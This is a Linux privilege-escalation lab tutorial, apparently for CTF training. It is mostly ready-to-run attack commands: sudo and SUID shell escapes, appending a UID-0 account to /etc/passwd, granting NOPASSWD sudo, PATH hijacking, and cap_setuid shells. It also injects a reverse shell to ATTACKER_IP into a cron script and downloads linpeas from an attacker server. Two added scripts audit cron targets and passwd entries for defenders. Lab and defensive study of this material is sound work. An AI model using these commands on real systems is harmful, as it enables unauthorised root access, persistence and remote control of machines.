🎯 Lab Objectives
- Enumerate the target system thoroughly before attempting escalation
- Identify and exploit sudo misconfigurations using GTFOBins
- Find and abuse SUID/SGID binaries
- Detect writable cron job scripts and hijack them
- Exploit weak file permissions on sensitive files
- Use linpeas to automate privilege escalation enumeration
Step 1 – System Enumeration
# OS and kernel version
uname -a
cat /etc/os-release
cat /proc/version
# Hostname and network
hostname
ip a
cat /etc/hosts
# Running processes
ps aux
ps aux | grep root
# Listening services
ss -tulnp
netstat -tulnp
Step 2 – Current User Context
# Who are we?
whoami
id
groups
# What can we read?
cat /etc/passwd
cat /etc/shadow # only if world-readable (misconfiguration!)
# Check home directories
ls -la /home/
ls -la ~/.ssh/
# History files – may contain passwords
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.nano_history
Step 3 – Sudo Rights
Check what the current user can run with sudo – this is often the fastest path to root.
# List sudo permissions
sudo -l
# Common exploitable sudo entries:
# (ALL) NOPASSWD: /usr/bin/vim – vim can spawn a shell
# (ALL) NOPASSWD: /usr/bin/find – find -exec can run commands
# (ALL) NOPASSWD: /usr/bin/python3 – spawn a shell directly
# GTFOBins exploits (check gtfobins.github.io)
# Exploit sudo vim
sudo vim -c ':!/bin/bash'
# Exploit sudo find
sudo find . -exec /bin/bash \; -quit
# Exploit sudo python3
sudo python3 -c 'import os; os.system("/bin/bash")'
# Exploit sudo less/more (shell escape)
sudo less /etc/passwd
# Then type: !/bin/bash
Step 4 – SUID Binaries
SUID binaries run with the file owner's permissions (usually root). If a SUID binary can run arbitrary commands, you can escalate.
# Find all SUID binaries
find / -perm -u=s -type f 2>/dev/null
# Find SUID owned by root specifically
find / -user root -perm -4000 -type f 2>/dev/null
# Common exploitable SUID binaries:
# bash with SUID set
/bin/bash -p # -p preserves SUID privileges
# nmap (older versions)
nmap --interactive
# Then: !sh
# cp – overwrite /etc/passwd
# Generate password hash: openssl passwd -1 -salt xyz hacker
# Add root2:$1$xyz$hash:0:0:root:/root:/bin/bash to /etc/passwd
# Then: su root2
# Custom SUID binary calling system() without full path
# Check with: strings /path/to/suid-binary | grep -v "/"
Step 5 – Cron Jobs
# System-wide crontab
cat /etc/crontab
cat /etc/cron.d/*
ls /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/
# User crontabs
crontab -l
cat /var/spool/cron/crontabs/* 2>/dev/null
# Find writable scripts called by cron
# If /etc/crontab runs: * * * * * root /opt/backup.sh
# And backup.sh is world-writable:
ls -la /opt/backup.sh
# Inject reverse shell into writable cron script
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh
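As an added example that is not part of the original lab, here is the defender-side audit of the misconfiguration this step hunts for, written in POSIX sh: it parses a system-format crontab (five schedule fields or an @keyword, then user, then command), resolves each job's script and flags targets that are group/other-writable or missing. The function names `cron_targets` and `audit_cron_file` are my own.

```shell
#!/bin/sh
# Added audit helper, not part of the original lab: list the scripts that the
# system crontab files run and flag any that a non-root user could modify.
# Assumes the /etc/crontab layout: 5 schedule fields (or an @keyword), user, command.
# User crontabs (crontab -l) have no user field and are not handled here.

# Print "user path" for every job whose command starts with an absolute path.
# Jobs that begin with a shell builtin or a bare command name are skipped.
cron_targets() {
    awk '
        /^[[:space:]]*(#|$)/ { next }                    # comments and blank lines
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }  # SHELL=, PATH=, MAILTO= ...
        {
            if ($1 ~ /^@/) { user = $2; cmd = $3 }       # @reboot user command
            else           { user = $6; cmd = $7 }       # m h dom mon dow user command
            if (cmd ~ /^\//) print user, cmd
        }' "$1"
}

# For each target print one line "STATUS user path", where STATUS is
#   WRITABLE - group or others can write the script (fix: chmod go-w; chown root:root)
#   MISSING  - the script does not exist, so whoever can write its directory creates it
#   OK       - neither condition applies
audit_cron_file() {
    cron_targets "$1" | while read -r user path; do
        if [ ! -e "$path" ]; then
            echo "MISSING $user $path"
        else
            # columns 6 and 9 of ls -l are the group and other write bits
            case "$(ls -ld "$path")" in
                ?????w*|????????w*) echo "WRITABLE $user $path" ;;
                *)                  echo "OK $user $path" ;;
            esac
        fi
    done
}

# Run against the live system files when they are readable.
for f in /etc/crontab /etc/cron.d/*; do
    if [ -r "$f" ]; then audit_cron_file "$f"; fi
done
```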
Step 6 – Writable Sensitive Files
# Find world-writable files
find / -writable -type f 2>/dev/null | grep -v proc
# Writable /etc/passwd = instant root
# Generate password hash
openssl passwd -1 -salt hack hacker123
# Append new root user
echo 'hacker:$1$hack$...:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker # enter hacker123
# Writable /etc/sudoers
echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
sudo su
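The detection counterpart to the /etc/passwd and /etc/sudoers abuse in Steps 4 and 6, added here and not from the original lab: `audit_passwd` (a name chosen for this example) scans an /etc/passwd file for the artefacts an appended root account leaves behind (a second UID-0 entry, a hash stored in passwd instead of shadow, a malformed line), and `check_perms` reports whether the files these steps rely on being writable actually are. Both take paths as arguments so they can be run against a copy or a constructed sample.

```shell
#!/bin/sh
# Added detection helper, not part of the original lab: audit an /etc/passwd
# file for the traces left by appending a UID-0 account with an inline hash,
# and check the permissions that attack depends on.

# Print one finding per line:
#   EXTRA_UID0 <user>      - an account other than root with UID 0
#   LOCAL_HASH <user>      - a crypt hash ($id$salt$hash) stored in passwd, not shadow
#   EMPTY_PASSWORD <user>  - an empty password field (login without a password)
#   BAD_FIELDS <line>      - a line without the seven colon-separated fields
audit_passwd() {
    awk -F: '
        NF != 7                 { print "BAD_FIELDS", $0; next }
        $3 == 0 && $1 != "root" { print "EXTRA_UID0", $1 }
        $2 ~ /^\$/              { print "LOCAL_HASH", $1 }
        $2 == ""                { print "EMPTY_PASSWORD", $1 }
    ' "$1"
}

# Print "WRITABLE <path>" for each existing file that group or others can write.
# Expected: /etc/passwd 0644, /etc/shadow 0640 (root:shadow), /etc/sudoers 0440.
check_perms() {
    for f in "$@"; do
        if [ -e "$f" ]; then
            # columns 6 and 9 of ls -l are the group and other write bits
            case "$(ls -ld "$f")" in
                ?????w*|????????w*) echo "WRITABLE $f" ;;
            esac
        fi
    done
}

# Run against the live system when the files are readable.
if [ -r /etc/passwd ]; then audit_passwd /etc/passwd; fi
check_perms /etc/passwd /etc/shadow /etc/sudoers
```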
Step 7 – PATH Hijacking
# If a SUID binary calls a command without full path:
# strings /usr/local/bin/suid_program – shows "service" (no /usr/sbin/service)
# Create malicious 'service' binary in /tmp
echo '#!/bin/bash' > /tmp/service
echo '/bin/bash -p' >> /tmp/service
chmod +x /tmp/service
# Prepend /tmp to PATH so our binary is found first
export PATH=/tmp:$PATH
# Run the SUID program – it calls our fake 'service'
/usr/local/bin/suid_program
Step 8 – Linux Capabilities
# Find binaries with capabilities set
getcap -r / 2>/dev/null
# Dangerous capabilities:
# cap_setuid+ep – can change UID to root
# cap_net_raw+ep – raw packet access
# cap_dac_override+ep – bypass file permissions
# Python with cap_setuid:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl with cap_setuid:
perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
Step 9 – Kernel Exploits
Kernel exploits can crash the system. Use as a last resort only, and never on production systems.
# Get kernel version
uname -r
# e.g. 3.13.0-24 – DirtyCow (CVE-2016-5195)
# Use linux-exploit-suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
bash linux-exploit-suggester.sh
# Metasploit post module
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
Step 10 – Automate with LinPEAS
# Transfer linpeas to target (from attacker machine)
# On attacker: python3 -m http.server 8080
# On target:
wget http://ATTACKER_IP:8080/linpeas.sh -O /tmp/linpeas.sh
curl http://ATTACKER_IP:8080/linpeas.sh -o /tmp/linpeas.sh
# Run LinPEAS
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh 2>/dev/null | tee /tmp/linpeas_output.txt
# Focus on red/yellow highlighted items first
# Key sections to review:
# - Sudo version (check for CVEs)
# - SUID binaries
# - Interesting files (passwords, keys)
# - Cron jobs
# - Network connections
PrivEsc Checklist
- `sudo -l` – Check sudo rights, cross-reference GTFOBins
- `find / -perm -u=s 2>/dev/null` – SUID binaries
- `cat /etc/crontab` – Cron jobs running as root
- `find / -writable -type f 2>/dev/null` – Writable files
- `getcap -r / 2>/dev/null` – Linux capabilities
- `cat ~/.bash_history` – Command history with passwords
- `ls -la /etc/passwd /etc/shadow` – File permissions
- `uname -r` + linux-exploit-suggester – Kernel exploits
- Run LinPEAS for automated full enumeration
Lab Complete! You now have a systematic approach to Linux privilege escalation. Every CTF machine and real engagement uses these same techniques.